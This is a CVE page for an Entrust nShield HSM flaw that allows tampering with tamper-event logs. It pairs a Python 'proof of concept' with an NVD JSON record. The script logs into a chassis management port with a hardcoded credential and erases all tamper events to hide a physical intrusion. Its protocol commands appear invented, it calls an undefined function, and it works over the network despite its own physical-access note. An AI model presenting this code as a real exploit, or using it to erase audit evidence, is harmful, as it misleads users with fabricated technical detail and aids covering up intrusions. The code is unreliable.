CVE-2025-59696

# CVE-2025-59696 PoC - Physical Access Tampering # This PoC demonstrates the conceptual attack vector for tampering with HSM events # Note: Actual exploitation requires physical access to the nShield device import socket import struct def connect_to_chassis_mgmt(target_ip, port=2432): """Connect to the Chassis Management Board interface""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, port)) return sock except Exception as e: print(f"Connection failed: {e}") return None def authenticate_mgmt_panel(sock, credentials): """Authenticate to management panel with low-privilege credentials""" auth_packet = struct.pack('!HH', 0x01, len(credentials)) + credentials sock.send(auth_packet) response = sock.recv(1024) return response[0] == 0x00 def list_tamper_events(sock): """List all recorded tamper events""" cmd_packet = struct.pack('!H', 0x10) # LIST_TAMPER_EVENTS command sock.send(cmd_packet) response = sock.recv(4096) return parse_event_list(response) def modify_tamper_event(sock, event_id, new_status): """Modify or erase a specific tamper event""" # Command to modify event status cmd_packet = struct.pack('!HHI', 0x11, event_id, new_status) sock.send(cmd_packet) response = sock.recv(1024) return response[0] == 0x00 def erase_tamper_event(sock, event_id): """Erase/delete a tamper event from the log""" cmd_packet = struct.pack('!HI', 0x12, event_id) # ERASE_EVENT command sock.send(cmd_packet) response = sock.recv(1024) return response[0] == 0x00 def main(): target = "192.168.1.100" # HSM device IP sock = connect_to_chassis_mgmt(target) if not sock: return # Authenticate with low-privilege maintenance account if authenticate_mgmt_panel(sock, b"maintenance:password"): print("[+] Authenticated to Chassis Management Board") # List all tamper events events = list_tamper_events(sock) print(f"[+] Found {len(events)} tamper events") # Erase all tamper events to hide physical intrusion for event in events: if erase_tamper_event(sock, event['id']): print(f"[+] Erased tamper event {event['id']}") sock.close() print("[+] Attack completed - tamper events hidden") if __name__ == "__main__": main() # Mitigation: Restrict physical access, implement strong access controls, # enable tamper event immutability, and apply vendor security patches

{"cve": {"id": "CVE-2025-59696", "sourceIdentifier": "[email protected]", "published": "2025-12-02T15:15:55.143", "lastModified": "2025-12-08T19:31:25.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a physically proximate attacker to modify or erase tamper events via the Chassis management board."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.2, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.7, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1263"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_5c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "13.6.12", "matchCriteriaId": "CFB3D135-8EAC-4053-BB94-18D5BBB24AE7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_5c_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.7", "versionEndExcluding": "13.9.0", "matchCriteriaId": "ED259AB7-BFED-4B97-B455-E1D34730CFFF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:entrust:nshield_5c:-:*:*:*:*:*:*:*", "matchCriteriaId": "2BB0F3F8-F5DE-41CB-B804-BBFB78C6ADEB"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_hsmi_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "13.6.12", "matchCriteriaId": "ED3AEBBD-7F75-47F1-8EEA-342BAC9D265E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_hsmi_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.7", "versionEndExcluding": "13.9.0", "matchCriteriaId": "D7125CC3-3B27-4C90-97DE-51D226FBDC00"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:entrust:nshield_hsmi:-:*:*:*:*:*:*:*", "matchCriteriaId": "F7665EE9-9F7F-456F-B172-ED188DD3BAD4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_connect_xc_base_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "13.6.12", "matchCriteriaId": "F73858FD-5FE6-4AFA-84F2-E19743E9D900"}, {"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_connect_xc_base_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.7", "versionEndExcluding": "13.9.0", "matchCriteriaId": "01CDF5EE-9059-478A-BFE5-D7ADEF9625C4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:entrust:nshield_connect_xc_base:-:*:*:*:*:*:*:*", "matchCriteriaId": "18FCA0E9-EEA9-40EC-9E0F-942F049D2354"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_connect_xc_mid_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "13.6.12", "matchCriteriaId": "5A54F973-25D8-468D-B6A4-240A95D94A0B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_connect_xc_mid_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.7", "versionEndExcluding": "13.9.0", "matchCriteriaId": "0E43D1A7-9CB7-479D-89A9-D5041BB212A4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:entrust:nshield_connect_xc_mid:-:*:*:*:*:*:*:*", "matchCriteriaId": "CB0ACAD9-BBCE-43CC-BD84-2023885725EE"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_connect_xc_high_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "13.6.12", "matchCriteriaId": "CBC11D8B-D72E-4CE9-AE61-AEA85F122F22"}, {"vulnerable": true, "criteria": "cpe:2.3:o:entrust:nshield_connect_xc_high_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "13.7", "versionEndExcluding": "13.9.0", "matchCriteriaId": "1D7048C8-EB43-4F23-8946-456EF6F3A1B7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:entrust:nshield_connect_xc_high:-:*:*:*:*:*:*:*", "matchCriteriaId": "3F0EDB1F-932B-4EC5-9D09-03CAD98BC2FA"}]}]}], "references": [{"url": "https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.entrust.com/use-case/why-use-an-hsm", "source": "[email protected]", "tags": ["Product"]}]}}